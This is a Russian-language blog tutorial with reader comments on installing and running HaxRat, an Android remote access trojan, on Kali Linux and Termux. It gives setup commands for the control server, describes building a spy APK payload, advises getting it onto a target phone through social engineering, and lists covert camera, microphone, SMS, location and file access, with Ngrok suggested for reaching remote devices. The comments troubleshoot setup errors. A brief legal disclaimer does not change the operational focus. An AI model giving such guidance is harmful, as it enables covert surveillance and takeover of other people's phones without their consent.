HaxRat — это мощный инструмент для скрытого удаленного управления Android, проще говоря, это RAT для Android, работающий на NodeJS. В статье покажу, как установить и использовать HaxRat на Termux (Android) и Kali Linux.
Еще по теме: Как создать RAT для Android
Установка и использование HaxRat на Termux и Kali Linux
Ранее мы рассказывали про использование L3MON. HaxRat основан на L3MON, но имеет некоторые дополнительные функции, такие как: создание скриншотов, запись экрана, запись с передней и задней камеры.
Разработчик данного RAT (троян для удаленного доступа) — известный этичный хакер Hax4us.
Возможности HaxRat:
- Создание снимков экрана
- Запись действий пользователя
- Запись с фронтальной и задней камеры
- Блокировка устройства
- Данные о местоположении GPS.
- Запись микрофона
- Просмотр контактов.
- История и отправка СМС
- История звонков
- Просмотр установленных приложений
- Просмотр разрешений
- Просмотр буфера обмена
- Просмотр уведомлений в реальном времени
- Просмотр списка сетей Wi-Fi
- Удаленный доступ к файлам
- Встроенный билдер файла APK
Статья в образовательных целях и предназначается для пенстеров и этичных хакеров. При написании статьи использовались личные устройства автора. Использование подобных программ без письменного разрешения является преступлением. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши действия.
Установка и использование HaxRat на Kali Linux
Процесс установки HaxRat на Kali Linux такой же, как и L3MON.
Запустите Kali Linux (см. Создание флешки Kali Linux) и откройте терминал.
Установите JRE на Kali Linux (более подробно см. в статье Установка Java 8 OpenJDK на Kali Linux):
1 |
sudo apt-get install openjdk-8-jre |
Скачайте NodeJ:
1 |
curl -sL https://deb.nodesource.com/setup_13.x | sudo bash - |
Установите NodeJs:
1 |
sudo apt-get install -y nodejs |
Установите диспетчер процессов pm2:
1 |
sudo npm install pm2 -g |
Установите HaxRat из репозитория GitHub:
1 |
git clone https://github.com/Hax4us/haxRat |
Перейдите в каталог server:
1 |
cd /haxRat/server |
Установите зависимости:
1 |
npm install |
Запустите сервер:
1 |
node index.js |
Запустите браузер и откройте панель управления HaxRat:
1 |
http://localhost:22533 |
Остановите сервер, нажав на сочетание клавиш CTRL + C.
Создайте учетную запись. Мы об этом подробно рассказывали, в руководстве по L3MON (см. ссылку выше).
После входа в панель управления, вы попадете на главную страницу HaxRat.
Теперь займемся созданием полезной нагрузки (вредоносного файла APK), для этого перейдите на вкладку APK Builder, укажите свой локальный IP-адрес и создайте полезную нагрузку.
Если при создании APK возникнет ошибка «Wrong java Version installed….», попробуйте выполнить следующую команду:
1 |
sudo update-alternatives --config java |
Введите 2 и нажмите Enter. Остановите работающий сервер HaxRat с помощью CTRL + C и запустите его заново. Это должно решить проблему, когда HaxRat не работает.
Итак, у нас есть файл Spy APK, который необходимо запустить на целевом телефоне. Хорошо если есть физический доступ, если нет, тогда включайте мозг и используйте методы социальной инженерии.
После запуска и выполнения полезной нагрузки на панели haxRat появиться удаленное устройство:
Теперь вы сможете удаленно управлять телефоном.
Можно посмотреть список всех установленных приложений:
Просматривать и скачивать файл в файловом менеджере:
Записать видео с фронтальной камеры:
И еще много чего!
Установка HaxRat на Android при помощи Termux
Для установки HaxRat на Android с помощью Termux (см. также Установка пакетов в Termux), выполните следующие команды:
1 |
apt install nodejs |
1 |
git clone https://github.com/hax4us/haxRat.git |
1 |
cd haxRat/server |
1 |
npm install |
1 |
mkdir ~/haxrat |
1 |
haxrat |
1 |
node index.js |
Откройте браузер и для входа в панель управления, перейдите по адресу:
1 |
http://ваш-локальный-ip:22533 |
Если все сделали правильно, откроется панель управления.
Вот таким образом можно запустить сервер HaxRat и взять под контроль любое устройство Android в нашей локальной сети. Также можно использовать его за пределами солнечной системы локальной сети, с помощью PortMap или Ngrok.
Заключение
HaxRat — мощный инструмент для скрытого удаленного управления телефоном. Только используйте его с умом. Не нарушайте закон!
Еще больше материала, найдете в разделе «Контроль».
ПОЛЕЗНЫЕ ССЫЛКИ:
Привет, не решается вопрос с ошибкой «Wrong java Version installed….», к сожалению. Перепробовал уже и так и так (от 0 до 2) ни на одном не робит(
При переходе в панель управления в самом браузере вылеает ошибка:
SyntaxError: Unexpected identifier in /home/and/haxRat/server/assets/views/login.ejs while compiling ejs
Эта ошибка указывает на проблему с синтаксисом в файле login.ejs или нет разрешений на выполнение файла.
Выдает SyntaxError: Unexpected identifier in /home/*********/haxRat/server/assets/views/login.ejs while compiling ejs
Такая же фигня. решили как-нибудь?
При создании полезной нагрузки выходит ошибка : ERROR Build Failed — Build Command Failed — Command failed: apkmod -r «/data/data/com.termux/files/home/haxRat/server/app/factory/decompiled» -o «/data/data/com.termux/files/home/haxrat/build.apk.
ПОМОГИТЕ ПОЖАЛУЙСТА!!!
Неправильные пути к файлам.
Недостаточно прав доступа.
Не открывается локалхост, что делать?
не одиданно но у меня всё отлично, но в сайт заходить не хочет
Наконец-то разобрался с HaxRat
После нескольких часов страданий, смог настроить haxrat.
Бесконечно Finalizing помогите я 7 раз переделываю —
не могу понять где брать пароль от сайта
пароль от сайта вводи сам а то есть вводишь в репозитории server { echo -n «12345» | md5sum }
тебе выдаст строку символов которую копируешь. потом вводишь { nano maindb.json }
и в строке «password» вставляешь эту строку символов. Твой пароль будет: 12345